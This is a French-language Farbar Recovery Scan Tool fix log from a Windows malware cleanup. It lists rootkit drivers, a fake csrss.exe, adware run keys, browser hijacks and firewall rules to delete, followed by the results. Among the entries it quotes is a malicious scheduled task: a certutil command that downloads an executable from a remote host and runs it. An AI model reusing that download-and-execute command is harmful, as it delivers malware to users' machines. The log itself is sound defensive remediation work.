Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 30-06-2019
Exécuté par nathan (02-07-2019 12:46:54) Run:2
Exécuté depuis C:\Users\nathan\Desktop
Profils chargés: nathan (Profils disponibles: nathan)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\Run: [CloudNet] => C:\Users\nathan\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-07-01] (EpicNet Inc.) [Fichier non signé]
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {1cdbc928-7ae7-11e8-8f04-309c237de986} - F:\setup.exe
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {77299983-6ef2-11e8-8724-309c237de986} - E:\setup.exe
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {7729998e-6ef2-11e8-8724-309c237de986} - F:\Install.exe
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {bc299b7e-6fe0-11e8-9ffc-309c237de986} - H:\setup.exe
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\75.0.3770.100\Installer\chrmstp.exe [2019-06-20] (Google LLC -> Google LLC)
BootExecute: autocheck autochk * SmartDefragBootTime.exe
GroupPolicy: Restriction - Chrome
CHR HKLM\SOFTWARE\Policies\Google: Restriction
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1
DeleteKey: HKCU\SOFTWARE\BDEsoft
DeleteKey: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\BDEsoft
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{0B98273D-9B99-44A9-98D8-B41F26CE4046}D:\jeux\fifa18\fifa18.exe
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{21556817-0DD1-421B-ACAC-7DA2C68F5990}D:\jeux\fifa18\fifa18.exe
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{ECC86769-7F66-4B10-8F5C-9236014AD6C2}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{EA422745-2A59-4210-9170-FC0F681D690D}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{B9306A65-8495-4668-896A-47A6EBC63B64}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{35C516B9-33DB-4BC7-97D5-E2FA37E346B5}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{B46674A1-E065-4ED0-B455-C03D8FCF3124}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{0DE91D78-08C0-4B2A-8131-6D960DF45E00}
C:\Windows\Installer\57f7ee1.msi
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32
unlock: C:\Windows\system32\drivers\8f00b204e9800998.sys
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998
C:\Windows\system32\drivers\8f00b204e9800998.sys
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Maintenance\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{7665F26F-D11E-4498-A63E-08137544961B
C:\Windows\System32\Tasks\csrss
C:\Windows\rss\csrss.exe
DeleteValue: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|HiddenWildflower
DeleteValue: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|CloudNet
C:\Users\nathan\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
DeleteValue: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Windows\CurrentVersion\Run|HiddenWildflower
DeleteValue: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Windows\CurrentVersion\Run|CloudNet
C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
DeleteKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Machiner
DeleteKey: HKCU\SOFTWARE\EpicNet Inc.
DeleteKey: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\EpicNet Inc.
C:\Users\nathan\AppData\Roaming\EpicNet Inc
unlock: C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{6ABD440F-1FFB-4D0C-9583-5E4424CF0274}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{C9556D39-B9A6-43C4-810C-03A9B6D109BA}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{CC591A08-D941-407D-ADD0-5C82541F4712}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{20DD73F2-E149-466F-BB93-F299F8BE0AB4}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{76C79DF7-CFB6-4C67-A9B3-BCD16935B67B}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{AE7A5805-90E9-4FFF-9ED7-938DF6241B12}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{57E7BFC8-7693-4364-BA30-22F3DF4B0FBA}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{9ABD77F7-C23E-4E51-A7F1-968BE5FF2E5E}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{C56EF7C0-D85D-4FB2-BD8D-0DBE8B57ED74}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{6ABD440F-1FFB-4D0C-9583-5E4424CF0274}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{C9556D39-B9A6-43C4-810C-03A9B6D109BA}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{CC591A08-D941-407D-ADD0-5C82541F4712}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{20DD73F2-E149-466F-BB93-F299F8BE0AB4}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{76C79DF7-CFB6-4C67-A9B3-BCD16935B67B}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{AE7A5805-90E9-4FFF-9ED7-938DF6241B12}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{57E7BFC8-7693-4364-BA30-22F3DF4B0FBA}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{9ABD77F7-C23E-4E51-A7F1-968BE5FF2E5E}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{C56EF7C0-D85D-4FB2-BD8D-0DBE8B57ED74}
Task: {75F6A243-14B7-4B77-B1E9-6CD40BCB2166} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://fstyline.xyz/app/app.exe C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe /31340
Task: {7665F26F-D11E-4498-A63E-08137544961B} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [5161472 2019-07-01] () [Fichier non signé]
Task: {F7E55B26-44E1-46ED-BC51-75E09A93BFBB} - System32\Tasks\ewSXxaflLkNov2 => C:\Windows\system32\wscript.exe "C:\ProgramData\xpekMjRorgkcLnVB\HcCoFUY.wsf"
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErR1DGytAxJ2NzqtF9dPANsNo_Onure0_Fi6qpvpBxdx9emiUVWOlHKghequCMhfWmFpRBhKYPOHulyoCeZNXQ-rERvXwcj9kxg6BhDwMLSkriFhHFainxVFBHBDcoHt-kkQve9GzHO9fzvkMgAuqA2giNUmbClselIu9JNlNyhJA,&q={searchTerms}
CHR HomePage: Default -> hxxp://www.funnysearching.com/
R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] (Accès refusé)
S2 yzrnpmcu; C:\Windows\SysWOW64\yzrnpmcu\jhokjsqh.exe [0 0000-00-00] ()
S2 AdvancedSystemCareService12; C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe [X]
S3 Denuvo Kuser Data Driver 1.0.0.7; pas de ImagePath
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] ()
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider)
S3 AscFileControl; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscFileControl.sys [X]
S3 AscFileFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscFileFilter.sys [X]
S3 AscRegistryFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscRegistryFilter.sys [X]
S3 iobit_monitor_server; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\Monitor_win7_x64.sys [X]
U3 MBAMService; pas de ImagePath
2019-06-29 11:34 - 2019-07-02 09:16 - 000003184 _____ C:\Windows\System32\Tasks\csrss
2019-06-29 11:34 - 2019-06-29 11:34 - 000002890 _____ C:\Windows\System32\Tasks\ewSXxaflLkNov2
2019-06-29 11:15 - 2019-06-29 11:15 - 000000000 ____D C:\Windows\SysWOW64\yzrnpmcu
2019-06-29 11:15 C:\Windows\SysWOW64\yzrnpmcu
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ShortcutWithArgument: C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP%
ShortcutWithArgument: C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP%
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP%
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP%
AlternateDataStreams: C:\Users\nathan\AppData\Local\Temp:$DATA​ [16]
EmptyTemp:

*****************

Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => non trouvé(e)
"HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{1cdbc928-7ae7-11e8-8f04-309c237de986} => non trouvé(e)
HKLM\Software\Classes\CLSID\{1cdbc928-7ae7-11e8-8f04-309c237de986} => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{77299983-6ef2-11e8-8724-309c237de986} => non trouvé(e)
HKLM\Software\Classes\CLSID\{77299983-6ef2-11e8-8724-309c237de986} => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{7729998e-6ef2-11e8-8724-309c237de986} => non trouvé(e)
HKLM\Software\Classes\CLSID\{7729998e-6ef2-11e8-8724-309c237de986} => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{bc299b7e-6fe0-11e8-9ffc-309c237de986} => non trouvé(e)
HKLM\Software\Classes\CLSID\{bc299b7e-6fe0-11e8-9ffc-309c237de986} => non trouvé(e)
HKLM\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} => non trouvé(e)
HKLM\System\CurrentControlSet\Control\Session Manager\\BootExecute => valeur restauré(es) avec succès
"C:\Windows\system32\GroupPolicy\Machine" => non trouvé(e)
HKLM\SOFTWARE\Policies\Google => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1 => non trouvé(e)
HKCU\SOFTWARE\BDEsoft => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\BDEsoft => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{0B98273D-9B99-44A9-98D8-B41F26CE4046}D:\jeux\fifa18\fifa18.exe" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{21556817-0DD1-421B-ACAC-7DA2C68F5990}D:\jeux\fifa18\fifa18.exe" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{ECC86769-7F66-4B10-8F5C-9236014AD6C2}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{EA422745-2A59-4210-9170-FC0F681D690D}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B9306A65-8495-4668-896A-47A6EBC63B64}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{35C516B9-33DB-4BC7-97D5-E2FA37E346B5}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B46674A1-E065-4ED0-B455-C03D8FCF3124}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0DE91D78-08C0-4B2A-8131-6D960DF45E00}" => non trouvé(e)
"C:\Windows\Installer\57f7ee1.msi" => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
"C:\Windows\system32\drivers\8f00b204e9800998.sys" => a été déverrouillé
HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998 => impossible à supprimer, clé était peut-être protégé(e)
